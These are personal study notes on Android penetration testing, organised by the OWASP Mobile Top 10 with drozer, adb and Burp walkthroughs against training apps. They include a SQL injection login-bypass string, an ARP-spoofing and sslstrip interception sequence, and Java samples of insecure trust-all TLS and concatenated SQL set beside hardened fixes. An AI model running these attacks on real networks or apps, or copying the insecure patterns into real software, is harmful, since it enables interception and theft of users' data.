These are the notes that I took while I was learning Android pentesting. Will update with some methodology soon!
- Media Player
- Activity Manager
- Window Manager
- Content Providers
- View System
- Notification Manager
- Package Manager
- Telephony Manager
- Resource Manager
- Location Manager
- Surface Manager
- Media Framework
- Audio Manager
Hardware Abstraction Layer
- Display Driver
- Camera Driver
- Bluetooth Driver
- Shared Memory Driver
- Binder (IPC) Driver
- USB Driver
- Kernel Driver
- Wifi Driver
- Audio Drivers
- Power Management
Common Mobile Application Functions
- Online Banking (Barclays)
- Social Network (Facebook)
- Streaming (Sky Go)
- Instant Messaging (WhatsApp)
- Voice Chat (Skype)
- File Sharing (Dropbox)
- Games (Angry Birds)
Document storage applications allowing users to access sensitive business documents on demand
Travel and expenses applications allowing users to create, store and upload expenses to an internal system
HR applications allowing users to access payroll, time sheets, slips, holiday information and other sensitive functionality
Internal service applications such as mobile applications that have been optimized to provide an internal resource such as the corporate intranet
Internal instant messaging applications allowing users to chat in real time with other users regardless of location
Client-Side Vulnerabilities
Insecure data storage
This category of vulnerability incorporates the various defects that lead to an application storing data on the mobile device in cleartext or in an obfuscated format, using a hard-coded key, or by any other means that can be trivially reversed by an attacker.
Insecure transmission of data
This involves any instance whereby an application does not use transport layer encryption to protect data in transit. It also includes cases where transport layer encryption is used but has been implemented in an insecure manner.
Lack of binary protections
This flaw means that an application does not employ any form of protection mechanism to complicate reverse engineering, malicious tampering or debugging.
Client-side injection
This category of vulnerability describes scenarios where untrusted data is sent to an application and handled in an unsafe manner. Typical origins of injection include other applications on the device and input populated into the application from the server.
Hard-coded passwords/keys
This flaw arises when the developer embeds a sensitive piece of information such as a password or an encryption key into the application.
Leakage of sensitive data
This involves cases where an application unintentionally leaks sensitive data through a side channel. It specifically includes data leakage that arises through use of a framework or the OS and occurs without the developer's knowledge.
OWASP Mobile Top 10 risks from 2014
- M1 – Weak Server-Side Control
- M2 – Insecure Data Storage
- M3 – Insufficient Transport Layer Protection
- M4 – Unintended Data Leakage
- M5 – Poor Authorization and Authentication
- M6 – Broken Cryptography
- M7 – Client Side Injection
- M8 – Security Decisions via untrusted input
- M9 – Improper session handling
- M10 – Lack of Binary Protections
OWASP Mobile Top 10 risks from 2016
- M1 – Improper Platform Usage
- M2 – Insecure Data Storage
- M3 – Insecure Communication
- M4 – Insecure Authentication
- M5 – Insufficient Cryptography
- M6 – Insecure Authorization
- M7 – Client Code Quality
- M8 – Code Tampering
- M9 – Reverse Engineering
- M10 – Extraneous Functionality
OWASP Top 10 mobile security tools
- iMAS – Created by the MITRE Corporation, this project is an open source secure application framework for iOS
- GoatDroid – self-contained training environment for Android applications
- iGoat – similar to the GoatDroid project, for iOS
- Damn Vulnerable iOS App (DVIA)
Browser-based applications – The term describes applications that are usually a "mobile friendly" clone of the main site and loaded via the device's browser.
Hybrid applications – The term refers to mobile applications that are a native wrapper around a WebView and often use a framework to access native device functionality.
Each app runs inside its own sandbox.
One App cannot access the data associated with other apps.
/data/data/ is the directory where all app data is located.
Connecting to adb with BlueStacks
adb connect localhost:5555
adb -s emulator-5554 shell
Start Learning OWASP Top 10 from 2014
M2-Insecure Data Storage
Android provides various ways to save app data.
It is up to the developer what kind of data is saved, how much data, etc.
- SQLite Databases
- Internal Storage
- External Storage
- Using network connection
Saving the username and password without encryption is not safe:
OnePlus3T:/data/data/com.ist.challenge3/shared_prefs # cat userdetails.xml
<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
    <string name="username">ist</string>
    <string name="password">ist</string>
</map>
OnePlus3T:/data/data/com.ist.challenge3/shared_prefs #
Reading files via adb
adb shell "su -c cat /data/data/com.ist.challenge4/databases/SQLINJECTION.db" > SQLINJECTION.db
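As an added example (not the challenge app's own code), the SharedPreferences pattern that produces a cleartext userdetails.xml like the dump above, beside a hardened version using AndroidX EncryptedSharedPreferences; the class name, file names and the session-token field are assumed for the illustration.

```java
import android.content.Context;
import android.content.SharedPreferences;
import androidx.security.crypto.EncryptedSharedPreferences;
import androidx.security.crypto.MasterKey;
import java.io.IOException;
import java.security.GeneralSecurityException;

public final class UserDetailsStore {

    // Weak pattern: MODE_PRIVATE stops other apps reading the file, but on a rooted
    // device (or via backup/extraction) the XML in shared_prefs/ holds the password
    // in cleartext, exactly as in the userdetails.xml dump in the notes.
    public static void saveInsecure(Context ctx, String user, String password) {
        SharedPreferences prefs = ctx.getSharedPreferences("userdetails", Context.MODE_PRIVATE);
        prefs.edit()
             .putString("username", user)
             .putString("password", password)
             .apply();
    }

    // Hardened pattern (AndroidX security-crypto): keys and values are encrypted with
    // a key kept in the Android Keystore (hardware-backed where the device supports
    // it), so the file on disk is ciphertext and a file dump alone does not recover
    // the credential. Better still, do not persist the password at all; store a
    // revocable server-issued session token instead (assumed field name).
    public static void saveEncrypted(Context ctx, String user, String token)
            throws GeneralSecurityException, IOException {
        MasterKey masterKey = new MasterKey.Builder(ctx)
                .setKeyScheme(MasterKey.KeyScheme.AES256_GCM)
                .build();
        SharedPreferences prefs = EncryptedSharedPreferences.create(
                ctx,
                "userdetails_secure",
                masterKey,
                EncryptedSharedPreferences.PrefKeyEncryptionScheme.AES256_SIV,
                EncryptedSharedPreferences.PrefValueEncryptionScheme.AES256_GCM);
        prefs.edit()
             .putString("username", user)
             .putString("session_token", token)
             .apply();
    }

    // Pentest check: pull the file the same way as in the notes
    // (adb shell "su -c cat /data/data/<pkg>/shared_prefs/userdetails_secure.xml")
    // and confirm that neither the key names nor the values are readable.
}
```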
M3-Insufficient Transport Layer Protection
It is pretty common to exchange data between the client and server.
Many apps do not use SSL for transmitting data.
Many apps trust self-signed certificates.
It is recommended to use certificates signed by a trusted CA provider.
An attacker may eavesdrop to get sensitive data.
There are many possible attack scenarios; below are a few:
- MITM with Burpsuite – Intercepting HTTP Traffic
- MITM with Burpsuite – Intercepting SSL Traffic
- Real world MITM attacks with arp spoofing
- Passive data analysis with tcpdump and wireshark
MITM with Burpsuite – Intercepting HTTP Traffic
Configure the proxy server for BlueStacks
cd to the BlueStacks folder
C:\Program Files\BlueStacks>HD-ConfigHttpProxy.exe set 192.168.189.1 8080
connect to specified proxy
C:\Program Files\BlueStacks>HD-ConfigHttpProxy.exe reset
reset/stop using proxy
Vulnerable URL – http://demo.testfire.net/login.jsp
x' or 'x'='x
MITM with Burpsuite – Intercepting SSL Traffic
Just add Burp's CA certificate to the device.
Real World MITM attacks with arp spoofing
echo "1" > /proc/sys/net/ipv4/ip_forward
sudo iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port <listenPort>
sudo sslstrip.py -l <listenPort>
sudo arpspoof -i <interface> -t <targetip> <gateway>
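As an added example (not code from the notes or from any app mentioned in them), the trust-all TrustManager that makes an app accept self-signed or proxy certificates, beside a pinning trust manager that keeps the platform's validation and additionally checks the server's SPKI hash; the class name and the expected-pin parameter are assumptions.

```java
import java.security.KeyStore;
import java.security.MessageDigest;
import java.security.NoSuchAlgorithmException;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.SSLContext;
import javax.net.ssl.TrustManager;
import javax.net.ssl.TrustManagerFactory;
import javax.net.ssl.X509TrustManager;
public final class TlsSetup {
    // Vulnerable: accepts any chain and any hostname, so Burp's CA, a self-signed
    // server cert or an arpspoof/sslstrip position all go unnoticed by the app.
    public static void trustEverything() throws Exception {
        TrustManager[] trustAll = { new X509TrustManager() {
            public void checkClientTrusted(X509Certificate[] c, String a) { }
            public void checkServerTrusted(X509Certificate[] c, String a) { }
            public X509Certificate[] getAcceptedIssuers() { return new X509Certificate[0]; }
        } };
        SSLContext sc = SSLContext.getInstance("TLS");
        sc.init(null, trustAll, null);
        HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
        HttpsURLConnection.setDefaultHostnameVerifier((host, session) -> true);
    }
    // Hardened: keep normal PKI validation and, on top of it, pin the SHA-256 of the leaf
    // SubjectPublicKeyInfo (expected pin is an assumed parameter). A proxy CA added to the
    // device store passes PKI validation but still fails the pin.
    public static SSLContext pinned(byte[] expectedSpkiSha256) throws Exception {
        TrustManagerFactory tmf = TrustManagerFactory.getInstance(TrustManagerFactory.getDefaultAlgorithm());
        tmf.init((KeyStore) null);                              // system trust store
        X509TrustManager platform = (X509TrustManager) tmf.getTrustManagers()[0];
        X509TrustManager pinning = new X509TrustManager() {
            public void checkClientTrusted(X509Certificate[] c, String a) throws CertificateException { platform.checkClientTrusted(c, a); }
            public void checkServerTrusted(X509Certificate[] c, String a) throws CertificateException {
                platform.checkServerTrusted(c, a);              // chain + validity first
                try {
                    byte[] spki = c[0].getPublicKey().getEncoded();
                    byte[] got = MessageDigest.getInstance("SHA-256").digest(spki);
                    if (!MessageDigest.isEqual(expectedSpkiSha256, got))   // constant-time compare
                        throw new CertificateException("SPKI pin mismatch");
                } catch (NoSuchAlgorithmException e) {
                    throw new CertificateException(e);
                }
            }
            public X509Certificate[] getAcceptedIssuers() { return platform.getAcceptedIssuers(); }
        };
        SSLContext sc = SSLContext.getInstance("TLS");
        sc.init(null, new TrustManager[] { pinning }, null);
        return sc;
    }
}
```

Pins must be rotated together with the server key, so ship a backup pin and an expiry. Since Android 7 apps ignore user-added CAs by default, which is why the "just add the Burp certificate" step only works for apps that opt back in or trust everything as above.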
M4-Unintended Data Leakage
When an application processes sensitive information taken as input from the user or any other source, it may result in placing data in an insecure location on the device. This insecure location could be accessible to other malicious apps running on the same device, thus leaving the device in a serious risk state.
- URL Caching (both request and response)
- Keyboard Press Caching
- Copy/Paste Buffer Caching
- Application backgrounding
- HTML5 data storage
- Browser cookie objects
- Analytics data sent to 3rd parties
Unintended Data Leakage — Reading the clipboard
The app will paste whatever you have copied from anywhere. That is the problem.
Unintended Data Leakage — Logging
Using logcat via adb:
adb logcat | grep password
M5-Poor Authentication and Authorization
It has various attack vectors.
Due to offline usage requirements, mobile apps may be required to perform local authentication or authorization checks within the mobile app's code.
But it is always recommended to do all the processing on the server side and then load the data onto the mobile device.
Due to usability requirements, mobile apps allow for passwords that are 4 digits long.
These can easily be brute forced.
Even if the passwords are stored as hashes on the server, an attacker can easily crack them using rainbow table attacks if the file where the hashes are stored is compromised.
M6-Broken Cryptography
The mobile app uses encryption and decryption that is fundamentally flawed and can be exploited by the adversary to decrypt sensitive data.
Poor key Management Processes
Including the keys in the same attacker-readable directory as the encrypted content.
Avoid the use of hardcoded keys within the binary.
Creating custom encryption protocols
Use apktool to decompile the app and check whether it contains any hash that can be cracked; if so, it is vulnerable to broken cryptography.
M7-Client Side Attack — SQL Injection at Client Side
x' or 'x'='x
This can easily bypass the login without a valid username and password.
M7-Frame Injection in WebViews
M8-Security Decisions via Untrusted Inputs — Intent Spoofing
The mobile application can accept data from all kinds of sources.
am – activity manager
If the activity is exported (exported = true), it can easily be started directly from outside the app:
am start -n com.ist.challenge1/.Welcome
M9-Improper Session Handling
Session-related attacks come into the picture if the session ID is compromised or not invalidated properly in the backend, if token creation is insecure, or if session timeouts are not implemented properly.
M10-Lack of Binary Protections
Reversing Android apps with apktool
Reversing android apps with dex2jar
Exploiting debuggable apps using JDB
Setting Up Drozer
Drozer is a framework for Android security assessments developed by MWR Labs.
Drozer allows you to assume the role of an Android app and interact with other apps through Android's Inter-Process Communication (IPC) mechanism and the underlying operating system.
It has nice modules such as leaking content providers, SQL injection and LFI.
Set up port forwarding:
adb -s emulator-5554 forward tcp:31415 tcp:31415
drozer console connect
Getting the list of all modules in drozer
Getting the list of all packages installed
To filter for a specific package:
run app.package.list -f challenge1
Getting package information
run app.package.info -a [package name]
dz> run app.package.info -a com.ist.challenge1
Package: com.ist.challenge1
  Application Label: Challenge1
  Process Name: com.ist.challenge1
  Version: 1.0
  Data Directory: /data/user/0/com.ist.challenge1
  APK Path: /data/app/com.ist.challenge1-2/base.apk
  UID: 10059
  GID:
  Shared Libraries: null
  Shared User ID: null
  Uses Permissions:
  - None
  Defines Permissions:
  - None
Finding out the attack surface
run app.package.attacksurface [package name]
dz> run app.package.attacksurface com.ist.challenge1
Attack Surface:
  2 activities exported
  0 broadcast receivers exported
  0 content providers exported
  0 services exported
    is debuggable
Listing out activities in a package
run app.activity.info -a [packagename]
Finding the content providers of a package
run scanner.provider.finduris -a [packagename]
Querying content providers
run app.provider.query [URI]
Inserting data into content providers
run app.provider.insert [URI] --[type] [column name] [value]
Intent Spoofing with drozer
First check the activities, then simply start the target activity:
dz> run app.activity.info -a com.ist.challenge1
Package: com.ist.challenge1
  com.ist.challenge1.MainActivity
    Permission: null
  com.ist.challenge1.Welcome
    Permission: null
dz> run app.activity.start --component com.ist.challenge1 com.ist.challenge1.Welcome
Exploiting Content Provider Leakage
Listing out activities in a package
run app.activity.info -a [package name]
Finding the secret content providers of a package.
run scanner.provider.finduris -a [package name]
run app.package.list -f vul
dz> run app.package.attacksurface com.androidpentesting.vulcontentprovider
Attack Surface:
  1 activities exported
  0 broadcast receivers exported
  1 content providers exported
  0 services exported
    is debuggable
dz> run scanner.provider.finduris -a com.androidpentesting.vulcontentprovider
Scanning com.androidpentesting.vulcontentprovider...
Able to Query    content://com.androidpentesting.vulcontentprovider.data/userdetails/
Able to Query    content://com.androidpentesting.vulcontentprovider.data/
Able to Query    content://com.androidpentesting.vulcontentprovider.data/userdetails
Able to Query    content://com.androidpentesting.vulcontentprovider.data

Accessible content URIs:
  content://com.androidpentesting.vulcontentprovider.data/
  content://com.androidpentesting.vulcontentprovider.data/userdetails/
  content://com.androidpentesting.vulcontentprovider.data
  content://com.androidpentesting.vulcontentprovider.data/userdetails
dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/
| id | name | bankdetails |
| 1  | ch4n | ch4n        |
The same data is reachable from an adb shell with the content command:
OnePlus3T:/ $ content query --uri content://com.androidpentesting.vulcontentprovider.data/userdetails/
Row: 0 id=1, name=ch4n, bankdetails=ch4n
OnePlus3T:/ $
SQL Injection in the Content Provider
dz> run scanner.provider.injection --uri content://com.androidpentesting.vulcontentprovider.data/userdetails/
Not Vulnerable:
  No non-vulnerable URIs found.

Injection in Projection:
  content://com.androidpentesting.vulcontentprovider.data/userdetails/

Injection in Selection:
  content://com.androidpentesting.vulcontentprovider.data/userdetails/
dz>
Check whether the provider is vulnerable to SQLi (a single quote breaks the query, showing the selection is concatenated into the SQL):
dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/ --selection "'"
unrecognized token: "')" (code 1): , while compiling: SELECT * FROM users WHERE (')
dz> run app.provider.query content://com.androidpentesting.vulcontentprovider.data/userdetails/
| id | name | bankdetails |
| 1  | ch4n | ch4n        |
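As an added example (not the vulnerable challenge provider's real source), a hypothetical provider for the users table above, showing the query shape that yields the "SELECT * FROM users WHERE (')" error beside a hardened one; the class name, column allowlist and in-memory database are constructed for the example, and its manifest comment also applies to the exported activity in the Intent Spoofing section.

```java
import android.content.ContentProvider;
import android.content.ContentValues;
import android.database.Cursor;
import android.database.sqlite.SQLiteDatabase;
import android.database.sqlite.SQLiteQueryBuilder;
import android.net.Uri;
import java.util.HashMap;
import java.util.Map;
// Hypothetical provider modelled on the notes: table "users", columns id, name, bankdetails.
public class UserDetailsProvider extends ContentProvider {
    private SQLiteDatabase db;
    // Allowlist of caller-visible columns; bankdetails is deliberately absent.
    private static final Map<String, String> PROJECTION_MAP = new HashMap<>();
    static { PROJECTION_MAP.put("id", "id"); PROJECTION_MAP.put("name", "name"); }

    @Override public boolean onCreate() {
        db = SQLiteDatabase.create(null);          // in-memory DB, constructed for the example
        db.execSQL("CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, bankdetails TEXT)");
        return true;
    }

    // Vulnerable shape: the caller's selection (drozer's --selection, or any app on the
    // device when the provider is exported) is spliced into the SQL text, which is why a
    // lone quote produces: unrecognized token ... while compiling: SELECT * FROM users WHERE (')
    public Cursor queryInsecure(String selection) {
        String sql = "SELECT * FROM users WHERE (" + selection + ")";
        return db.rawQuery(sql, null);
    }

    // Hardened shape: SQLiteQueryBuilder in strict mode validates the selection, rejects
    // projection columns outside PROJECTION_MAP (IllegalArgumentException), and the
    // caller's values travel as bound parameters (selectionArgs), never as SQL text.
    @Override public Cursor query(Uri uri, String[] projection, String selection,
                                  String[] selectionArgs, String sortOrder) {
        SQLiteQueryBuilder qb = new SQLiteQueryBuilder();
        qb.setTables("users");
        qb.setProjectionMap(PROJECTION_MAP);
        qb.setStrict(true);
        return qb.query(db, projection, selection, selectionArgs, null, null, sortOrder);
    }

    // Defence in depth: declare the <provider> in AndroidManifest.xml with
    // android:exported="false" (or guard it with a signature-level permission); the
    // same attribute on the <activity> closes the Intent Spoofing case described earlier.
    @Override public Uri insert(Uri uri, ContentValues values) { return null; }
    @Override public int delete(Uri uri, String sel, String[] args) { return 0; }
    @Override public int update(Uri uri, ContentValues v, String sel, String[] args) { return 0; }
    @Override public String getType(Uri uri) { return "vnd.android.cursor.dir/vnd.example.userdetails"; }
}
```

Re-running the drozer checks above against the hardened provider is the regression test: finduris should report no accessible URIs once the provider is unexported, and the --selection "'" probe should no longer surface a raw SQLite error.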
Firebase Database Takeover Vulnerability
I highly recommend checking this one out. It is free and super cool.
- SQLite Browser
Hackerone Android Report And Resources